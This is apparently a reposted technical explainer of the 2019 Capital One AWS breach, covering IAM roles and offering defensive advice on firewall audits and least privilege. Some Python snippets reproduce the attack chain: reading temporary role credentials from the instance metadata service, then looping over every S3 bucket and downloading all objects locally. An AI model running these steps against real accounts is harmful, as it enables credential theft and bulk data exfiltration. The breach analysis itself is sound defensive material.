

The Technical Side of the Capital One AWS Security Breach

Accepted submission by upstart at 2019-08-02 21:02:49
/dev/random


Submitted via IRC for AnonymousLuser

The Technical Side of the Capital One AWS Security Breach [jcolemorrison.com]

On July 19th, 2019, Capital One got the red flag that every modern company hopes to avoid - their data had been breached. Over 106 million people affected. 140,000 Social Security numbers. 80,000 bank account numbers. 1,000,000 Social Insurance Numbers. Pretty messy, right?

Unfortunately, the 19th wasn't when the breach occurred. It turns out that Paige Thompson, aka Erratic, had done the deed between March 22nd and March 23rd, 2019 - almost 4 months earlier. In fact, it took an external tip for Capital One to realize something had happened.

Though the former Amazon employee has been arrested and is facing $250k in fines and 5 years in prison...it's left a lot of residual negativity. Why? Because many of the companies that have suffered data breaches try to brush off the responsibility of hardening their infrastructure and applications against the rise in cyber crime.

ANYHOW. You can read more about the case by just asking Google. We won't go into that anymore. We're here to talk about the TECHNICAL side of things.

So first up - what happened?

Capital One had about 700 different S3 buckets that Paige Thompson copied and downloaded.

Second - was this just another case of a misconfigured S3 Bucket Policy?

Nope, not this time. Instead, she was able to get onto a server that sat behind a misconfigured firewall and access the buckets from there.

Wait how is this possible?

Well first, let's start with getting into the server. Very few details have been released about how she accessed one of their servers. All we've been told is that it was through a "misconfigured firewall." So it could have been something as simple as a sloppy security group setup, a web application firewall misconfiguration (Imperva), or a network firewall (iptables, ufw, shorewall, etc.). All we know from Capital One is that they've accepted that it's their fault [washingtonpost.com] and that they've closed the hole.

Stone said that while Capital One missed the firewall vulnerability on its own, the bank moved quickly once it did. That certainly was helped by the fact that the hacker allegedly left key identifying information out in the open, Stone said.

(Edit: for folks wondering why we don't go deeper here, understand that due to the limited info the best we can do is speculate on this part of the breach. This is relatively pointless considering the breach depended upon Capital One leaving an opening. And unless they come out and tell us more, we'd just be cycling through every possible way Capital One left their server open in combo with every possible way someone could exploit one of those various options. These openings and techniques can range from wildly stupid oversights to incredibly sophisticated patterns. Given the range of possibilities, this would turn into a long-winded saga with no real conclusion on this point. Therefore, we'll focus on analyzing the things that we DO have the facts for.)

And so there's the first thing to do - know what your firewalls allow

Keep a policy or process in place to ensure that ONLY what should be open is open. If you're using AWS resources like Security Groups or Network ACLs, obviously something as simple as a checklist can go a long way...but since many resources are created through automation (e.g. CloudFormation), one can also automate the auditing of these things. Whether that's a home-baked script that looks through what you're creating for crappy openings or working a security review into your CI/CD process...there are plenty of simple options to avoid this.
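To make the "automate the auditing" idea concrete, here's a minimal sketch of such a home-baked check using Python and boto3 (the library choice is an assumption; any SDK or the CLI works the same way). It simply flags security group ingress rules open to the whole internet - what counts as "too open" is a policy call you'd tune for your own environment:

    # Minimal audit sketch: flag security group ingress rules open to 0.0.0.0/0.
    # Assumes AWS credentials are configured; "too open" is a policy judgment call.
    import boto3

    ec2 = boto3.client("ec2")

    for page in ec2.get_paginator("describe_security_groups").paginate():
        for group in page["SecurityGroups"]:
            for rule in group.get("IpPermissions", []):
                if any(r.get("CidrIp") == "0.0.0.0/0" for r in rule.get("IpRanges", [])):
                    print(f"{group['GroupId']} ({group['GroupName']}): "
                          f"{rule.get('IpProtocol')} "
                          f"{rule.get('FromPort', 'all')}-{rule.get('ToPort', 'all')} "
                          f"open to 0.0.0.0/0")

Run something like this on a schedule or as a CI/CD gate and a wide-open rule gets noticed in minutes instead of months.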

The "funny" part about this breach is that if Capital One had plugged this hole from the get go...nothing else would've happened. And so, quite frankly, it's always shocking to see something that's really not that difficult become the sole reason for a company data breach. Especially one as large as Capital One.

Okay, so the hacker is in the box - what happened next?

Well, once you're in an EC2 Instance...a lot can go wrong. You're pretty much walking on the edge of a knife if you let someone get that far. But how did she get into the S3 buckets? To understand how, let's talk about IAM Roles.

So, to access AWS services, one way to do so is to be a User. Okay, pretty obvious. But what about if you want to give other things in AWS, for example your Application Servers, the permission to do things like access your S3 buckets? Well, that's what IAM Roles are for. An IAM Role has two components:

a) The Trust Policy - what services, or what people, can use this role?

b) The Permissions Policy - what does this role allow?

And so, for example, if you wanted to create an IAM Role that allowed EC2 instances to access an S3 bucket: first, the role would have a Trust Policy specifying that EC2 (the whole service), or specific instances, can "assume the role." By "assume the role," we mean they can use the role's permissions to do things. Second, the Permissions Policy would allow the service/person/resource that has "assumed the role" to do things on S3, whether that's accessing one specific bucket...or over 700 in Capital One's case.
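Here's a hedged sketch in Python/boto3 of what such a role might look like. The role name, policy name, and the deliberately broad "s3:*" on "*" grant are hypothetical - they illustrate the kind of over-broad permissions described above, not Capital One's actual policy:

    # Hypothetical over-broad IAM role for EC2 (names and scope are illustrative).
    import json
    import boto3

    iam = boto3.client("iam")

    # a) Trust Policy: WHO can assume the role - here, the EC2 service.
    trust_policy = {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"Service": "ec2.amazonaws.com"},
            "Action": "sts:AssumeRole",
        }],
    }
    iam.create_role(
        RoleName="app-server-role",
        AssumeRolePolicyDocument=json.dumps(trust_policy),
    )

    # b) Permissions Policy: WHAT the role allows - here, anything on any S3 bucket,
    #    which is exactly the breadth that turns one compromised server into 700 buckets.
    permissions_policy = {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*",
        }],
    }
    iam.put_role_policy(
        RoleName="app-server-role",
        PolicyName="broad-s3-access",
        PolicyDocument=json.dumps(permissions_policy),
    )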

The thing is though, once you're on an EC2 Instance with an IAM Role, you can do a few things to get the credentials:

1. You can query the instance's metadata at http://169.254.169.254/latest/meta-data [169.254.169.254]

Among other things, the IAM Role and its temporary access keys can be found through this. Of course...it's only possible if you're IN the instance.

2. Use the AWS CLI ...

Again, if you've made it onto the instance and the AWS Command Line Interface is installed, it gets loaded up with credentials from the IAM Role if one is present. All you have to do is do things THROUGH the instance. Granted, if their Trust Policy was open, Paige may have been able to do it directly. (A sketch of both approaches follows below.)
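Here's a minimal Python sketch of both paths. Everything here assumes you're running ON the instance, and the credentials returned belong to whatever role happens to be attached:

    # Sketch: how role credentials surface inside an EC2 instance (IMDSv1-style).
    # Works only when run on the instance itself.
    import boto3
    import requests

    # 1. Ask the instance metadata service directly.
    base = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    role_name = requests.get(base, timeout=2).text.strip()
    creds = requests.get(base + role_name, timeout=2).json()
    print(creds["AccessKeyId"])  # temporary AccessKeyId / SecretAccessKey / Token

    # 2. Or just let the SDK/CLI pick them up: boto3, like the AWS CLI, falls back
    #    to instance metadata credentials automatically when nothing else is configured.
    print(boto3.client("sts").get_caller_identity()["Arn"])  # shows the assumed-role ARN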

So the TL;DR on IAM Roles is that they're a way to let other resources ACT ON YOUR BEHALF on OTHER RESOURCES.

Now that you understand IAM Roles, we can talk about what Paige Thompson did:

  1. She accessed the Server (EC2 Instance) through an opening in the server firewalls

    Whether it was a security group / ACL or their own custom web application firewall, whatever it was, it was apparently pretty easy to close down, as noted in the official complaint and records.

  2. Once in the Server, she was able to act "as if" she was the server itself

  3. Since the Server's IAM Role allowed for S3 access to those 700+ Buckets, she was able to access them

From that point forward all she had to do was run the "List Buckets" command and then the "Sync" command from the AWS CLI...
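In CLI terms that's roughly "aws s3 ls" followed by "aws s3 sync" per bucket; the boto3 sketch below shows the same idea - enumerate every bucket the role can see, then pull the objects down. The local "dump" directory is a placeholder:

    # Sketch of what "List Buckets" plus "Sync" amounts to with boto3.
    # "dump" is a placeholder local directory.
    import os
    import boto3

    s3 = boto3.client("s3")

    for bucket in s3.list_buckets()["Buckets"]:
        name = bucket["Name"]
        print("syncing", name)
        for page in s3.get_paginator("list_objects_v2").paginate(Bucket=name):
            for obj in page.get("Contents", []):
                if obj["Key"].endswith("/"):  # skip folder placeholder objects
                    continue
                dest = os.path.join("dump", name, obj["Key"])
                os.makedirs(os.path.dirname(dest), exist_ok=True)
                s3.download_file(name, obj["Key"], dest)

The takeaway isn't the code; it's that once a role grants broad S3 access, a dozen lines is all it takes to walk off with every bucket it can reach.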

Capital One indicated that this breach will cost approximately $100 to $150 MILLION. [capitalone.com] Preventing this type of pain is why companies are investing so much into Cloud Infrastructure, DevOps, and Security experts. And just how valuable and cost-effective is moving to the cloud? So much that even in the face of more and more cyber security issues, the total public cloud market grew 42% in Q1 of 2019 [canalys.com]!

Moral of the story: audit your security; keep auditing your security regularly; respect the principle of least privilege for security policies.
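On that last point, here's what the earlier over-broad permissions policy looks like when trimmed down to least privilege - one hypothetical bucket, read-only actions, nothing else:

    # Hypothetical least-privilege permissions policy: one bucket, read-only.
    # Would replace the "s3:*" on "*" grant sketched earlier (attach via put_role_policy).
    least_privilege_policy = {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": ["s3:ListBucket"],
                "Resource": "arn:aws:s3:::app-data-bucket",
            },
            {
                "Effect": "Allow",
                "Action": ["s3:GetObject"],
                "Resource": "arn:aws:s3:::app-data-bucket/*",
            },
        ],
    }

With a policy like this, even a fully compromised instance only exposes the one bucket it actually needs.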

(You can check out the full legal report here [regmedia.co.uk].)

J Cole Morrison

Cloud Architect, Software Engineer, former Techstars Hackstar, AWS Solutions Architect, and Founder/Headmaster at awsdevops.io



Original Submission